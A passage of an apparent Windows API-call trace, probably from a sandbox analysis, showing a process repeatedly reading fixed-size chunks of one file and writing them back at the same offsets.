[0102.750] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0xfbc520, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0102.750] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0102.751] GetProcessHeap () returned 0x500000 [0102.751] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0102.751] GetProcessHeap () returned 0x500000 [0102.751] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0102.751] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0xff95b0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0102.751] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0102.764] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0xff95b0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0102.764] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0102.766] GetProcessHeap () returned 0x500000 [0102.766] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0102.766] GetProcessHeap () returned 0x500000 [0102.766] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0102.766] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x1036640, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0102.766] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0102.775] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x1036640, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0102.775] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0102.776] GetProcessHeap () returned 0x500000 [0102.776] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0102.776] GetProcessHeap () returned 0x500000 [0102.776] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0102.776] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x10736d0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0102.776] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0102.785] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x10736d0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0102.785] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0102.785] GetProcessHeap () returned 0x500000 [0102.785] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0102.785] GetProcessHeap () returned 0x500000 [0102.785] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0102.785] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x10b0760, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0102.786] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0102.795] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x10b0760, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0102.795] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0103.316] GetProcessHeap () returned 0x500000 [0103.316] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0103.316] GetProcessHeap () returned 0x500000 [0103.316] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0103.316] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x10ed7f0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0103.316] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0103.330] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x10ed7f0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0103.330] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0103.331] GetProcessHeap () returned 0x500000 [0103.331] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0103.331] GetProcessHeap () returned 0x500000 [0103.331] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0103.331] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x112a880, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0103.332] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0103.344] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x112a880, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0103.344] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0103.345] GetProcessHeap () returned 0x500000 [0103.345] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0103.345] GetProcessHeap () returned 0x500000 [0103.345] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0103.345] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x1167910, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0103.345] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0103.378] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x1167910, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0103.378] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0103.379] GetProcessHeap () returned 0x500000 [0103.379] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0103.379] GetProcessHeap () returned 0x500000 [0103.379] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0103.379] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x11a49a0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0103.379] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0103.386] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x11a49a0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0103.386] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0103.387] GetProcessHeap () returned 0x500000 [0103.387] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0103.387] GetProcessHeap () returned 0x500000 [0103.387] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0103.387] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x11e1a30, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0103.387] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0103.529] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x11e1a30, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0103.529] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0103.531] GetProcessHeap () returned 0x500000 [0103.531] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0103.531] GetProcessHeap () returned 0x500000 [0103.531] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0103.531] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x121eac0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0103.531] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0103.572] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x121eac0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0103.572] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0103.572] GetProcessHeap () returned 0x500000 [0103.572] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0103.572] GetProcessHeap () returned 0x500000 [0103.572] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0103.573] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x125bb50, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0103.573] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0103.746] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x125bb50, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0103.746] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0103.747] GetProcessHeap () returned 0x500000 [0103.747] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0103.747] GetProcessHeap () returned 0x500000 [0103.747] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0103.747] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x1298be0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0103.747] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0103.848] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x1298be0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0103.849] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0103.849] GetProcessHeap () returned 0x500000 [0103.849] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0103.850] GetProcessHeap () returned 0x500000 [0103.850] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0103.850] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x12d5c70, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0103.850] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0103.899] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x12d5c70, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0103.899] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0103.900] GetProcessHeap () returned 0x500000 [0103.900] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0103.900] GetProcessHeap () returned 0x500000 [0103.900] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0103.900] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x1312d00, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0103.900] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0104.049] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x1312d00, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0104.049] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0104.049] GetProcessHeap () returned 0x500000 [0104.049] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0104.050] GetProcessHeap () returned 0x500000 [0104.050] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0104.050] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x134fd90, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0104.050] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0104.459] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x134fd90, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0104.459] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0104.459] GetProcessHeap () returned 0x500000 [0104.460] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0104.460] GetProcessHeap () returned 0x500000 [0104.460] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0104.460] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x138ce20, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0104.460] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0104.572] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x138ce20, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0104.572] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0104.573] GetProcessHeap () returned 0x500000 [0104.573] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0104.573] GetProcessHeap () returned 0x500000 [0104.573] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0104.573] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x13c9eb0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0104.573] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0104.581] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x13c9eb0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0104.581] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0104.581] GetProcessHeap () returned 0x500000 [0104.581] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0104.582] GetProcessHeap () returned 0x500000 [0104.582] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0104.582] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x1406f40, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0104.582] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0104.643] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x1406f40, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0104.643] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0104.644] GetProcessHeap () returned 0x500000 [0104.644] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0104.644] GetProcessHeap () returned 0x500000 [0104.644] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0104.644] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x1443fd0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0104.644] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0104.661] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x1443fd0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0104.661] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0104.661] GetProcessHeap () returned 0x500000 [0104.661] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0104.661] GetProcessHeap () returned 0x500000 [0104.661] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0104.661] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x1481060, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0104.661] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0104.668] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x1481060, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0104.668] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0104.669] GetProcessHeap () returned 0x500000 [0104.669] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0104.669] GetProcessHeap () returned 0x500000 [0104.669] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0104.669] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x14be0f0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0104.669] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0104.678] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x14be0f0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0104.678] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0104.679] GetProcessHeap () returned 0x500000 [0104.679] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0104.679] GetProcessHeap () returned 0x500000 [0104.679] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0104.679] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x14fb180, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0104.679] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0104.711] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x14fb180, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0104.711] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0104.713] GetProcessHeap () returned 0x500000 [0104.713] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0104.713] GetProcessHeap () returned 0x500000 [0104.713] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0104.713] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x1538210, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0104.713] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: 